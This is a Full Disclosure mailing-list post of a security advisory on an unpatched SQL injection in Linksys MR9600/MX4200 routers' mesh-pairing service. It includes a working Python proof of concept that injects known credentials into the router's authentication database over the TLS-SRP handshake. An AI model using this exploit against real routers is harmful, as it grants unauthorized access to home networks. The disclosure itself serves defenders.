| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1747f4db-00f1-4fcf-9eb6-321c783a3ffb@syss.de>
Date: Thu, 12 Feb 2026 11:12:50 +0100
From: Christian Zäske via Fulldisclosure
<fulldisclosure@...lists.org>
To: <fulldisclosure@...lists.org>
Subject: [FD] [SYSS-2025-009] Linksys MX9600/MX4200 - SQL Injection
Advisory ID: SYSS-2025-009
Product: MR9600, MX4200 (and potentially others)
Manufacturer: Linksys
Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for
MX4200 (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2025-03-18
Solution Date: -
Public Disclosure: 2026-02-12
CVE Reference: Not yet assigned
Author of Advisory: Christian Zäske, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Linksys MX4200 is a Wi-Fi mesh router targeting home users.
The manufacturer describes the product as follows (see [1]):
"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."
Due to improper neutralization of special elements, SQL statements can
be injected via the handshake of a TLS-SRP connection. This can be used
to inject known credentials into the database. These credentials can be
utilized to successfully complete the handshake and use the protected
service.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The Linksys MX4200 (and other models) provides a service (sct_server
binary) running on TCP port 6060 (all interfaces except WAN), which is
used to integrate other mesh devices into the network. The service
accepts TLS-SRP connections with a username and password.
The service uses a different script (smcdb_auth) to receive credential
information from an SQLite databse using the given username. Since the
service does not properly neutralize special elements in the username,
arbitrary SQL statements can be injected. This can be used to insert
known credentials into the correct database table, which then provide
access to the protected service (sct_server).
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
Using the "tlslite-ng" library, the following Python code will inject
known credentials into the "authorize" table of the used SQLite database.
These credentials can be used to access the service.
from socket import *
from tlslite.api import *
from tlslite import *
N, g, salt, verifier = VerifierDB.makeVerifier("SySS", "SySS", 1024)
verifier_bytes = verifier.to_bytes(128)
sock = socket.socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.1.1", 6060))
conn = TLSConnection(sock)
try:
conn.handshakeClientSRP(f"\"a\n'; INSERT INTO authorize VALUES
('999', '999', 'SySS', 'SySS', '{salt.hex().upper()}', '');--\"",
"dummypass")
except:
pass
for byte in verifier_bytes:
sock = socket.socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.1.1", 6060))
conn = TLSConnection(sock)
try:
conn.handshakeClientSRP(f"\"a\n'; UPDATE authorize SET
verifier = verifier || '{byte.to_bytes(1).hex().upper()}' where id =
999;--\"", "dummypass")
except:
pass
After the code is executed, the TLS-SRP handshake will successfully
complete when authenticating with the username "SySS" and the
password "SySS".
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
There is no known solution yet.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for Linksys MX4200
https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-009
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-009.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Christian Zäske of SySS
GmbH.
E-Mail: christian.zaeske@...s.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
Download attachment "OpenPGP_0x7B00D164A32F9AC9.asc" of type "application/pgp-keys" (3148 bytes)
Download attachment "OpenPGP_signature.asc" of type "application/pgp-signature" (841 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists